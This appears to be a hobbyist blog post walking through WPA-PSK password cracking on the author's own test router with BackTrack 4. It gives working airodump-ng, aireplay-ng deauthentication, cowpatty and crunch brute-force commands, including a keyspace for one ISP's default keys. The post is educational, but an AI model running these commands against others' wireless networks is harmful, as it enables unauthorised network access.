A Samsung N110, pretty sweet, and actually did go for Windows XP OS, whatever you say about Windows, it is usually handy to have and when needing Linux, I'll just bootup the live USB.
Only small gripe I have is that the bios does now allow booting from SD card which is kinda annoying, but I have a tiny USB 8gig drive, so its OK. Its just that the eeePC seemed to be more versatile out of the box.. oh well, no worries, it works !
When BT4 is finalised I'll probably do a dual boot HDD install, but waiting with that for the moment :)
So anyway, back on track to backtrack ..
In previous posts I looked at wireless and WEP encrypted networks and how especially
the wep networks are dangerously weak.
This all done with BackTrack3 Final.
Important to note the below using BackTrack 4 Pre Final.
Now time to look at WPA and WPA2 protected networks which are normally the ones that
you will see the most.
I have setup a test network using my Asus router as follows ;
essid : default
Encryption : WPA-PSK
No MAC filtering
DHCP enabled
So the point of this is to demonstrate the problems with people using weak passwords for their WPA encrypted connections.
For this example we will use Cowpatty, which is a program made to crack WPA(2) passwords using either rainbow tables or simple wordlists.
Granted this does not catch all, but it can catch the uncautious.
The advantage of using rainbow tables is that it is much faster (when you actually have the tables that is..) just using a wordlist means the program has to combine the essid, with the passphrase, create a hash out of these two and see of it is OK.
Rainbow tables already have these hashes pre-computed, so saving time.
Some rainbow tables have already been made using of the some of the most commonly seen essids, using a 49 million word dictionary for use with Cowpatty; http://www.offensive-security.com/wpa-tables/
So what we need to do is the following
> Identify our target network
> Verify if any clients are associated to network
> If no clients associated.. wait..
> If clients associated, deauth and capture 4-way handshake
> Use this 4-way handshake to with cowpatty to crack network WPA password.
Identifying target
Start our interface in monitor mode and start up airodump, since I know my network will be a WPA network on channel 1, I start airodump with filters for those ;
airmon-ng
airmon-ng start wlan0
airodump-ng mon0 -c 1 -t WPA
And then see the target we are looking to attack
So after having identified the network I am after I will re-start airodump identifying the bssid and start monitoring and writing data (in this case using 'default' as filename to write to)and wait for a client to connect.
airodump-ng mon0 -c 1 -t WPA --bssid 00:13:D4:09:32:60 -w default
When the 4-way handshake is captured after the client associates (see top right of the picture below) I no longer need airodump and can continue.
If there is already a client connected to the AP, we need to deauth the client and force it to reconnect, thus giving the 4-way handshake we need.
In a seperate console;
aireplay-ng mon0 -0 5 -a 00:13:D4:09:32:60 -c 00:1F:3C:8C:D9:71
Now we need to have the WPA rainbow table handy for this crack, so use the link above for rainbow tables or make your own..
Start up cowpatty and enter information as necessary.
(All below my specific info, change to suit your needs)
In this case (in cowpatty console);
./cowpatty -d /media/disk/WPA_tables/default.wpa -r ~/default-01.cap -s default
When starting;
When done;
So as you can see from the above pic, the passphrase is butterfly and the program managed to go through over 45000 passwords per second.. pretty good !
Doing the exact same crack, but then just using the dictionary file from which the rainbow tables were made, the situation only changes when starting up cowpatty.
You still need the handshake with the AP and the essid, then proceed as follows;(in my case my wordlist is on the drive-folder /media/disk/WORDLISTS/)
./cowpatty -f /media/disk/WORDLISTS/wpalist.txt -r ~/default-01.cap -s default
I didn't have the patience to let it run its course.. it was only doing 34 passphrases a second and that would have taken a looong time ! However given time and patience.. a lot can be done.
Remember this done on a Samsung N110 with 2gig ram, if the cracking were to be done on a different/better setup, speed would be better.
It is also possible to bruteforce the passphrase using crunch and piping the output through cowpatty.
For instance, there is a telecom provider here that issued a WPA key along with it's router that
was always a combination of numbers and upper case characters up to F of 8 characters in length.
In that case, if we were to feel patient.. we could run crunch using the known variables and pipe the outcome to cowpatty as follows ;
/pentest/passwords/crunch/./crunch 8 8 0123456789ABCDEF | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/capfile.cap -s essid
I can do something similar in my case using buterfly as character set (since I know those are all the characters in the passphrase) and to speed things up fixing the first 5 characters;
/pentest/passwords/crunch/./crunch 9 9 buterfly -t butte@@@@ | /pentest/wireless/cowpatty/./cowpatty -f - -r ~/default-01.cap -s default -v
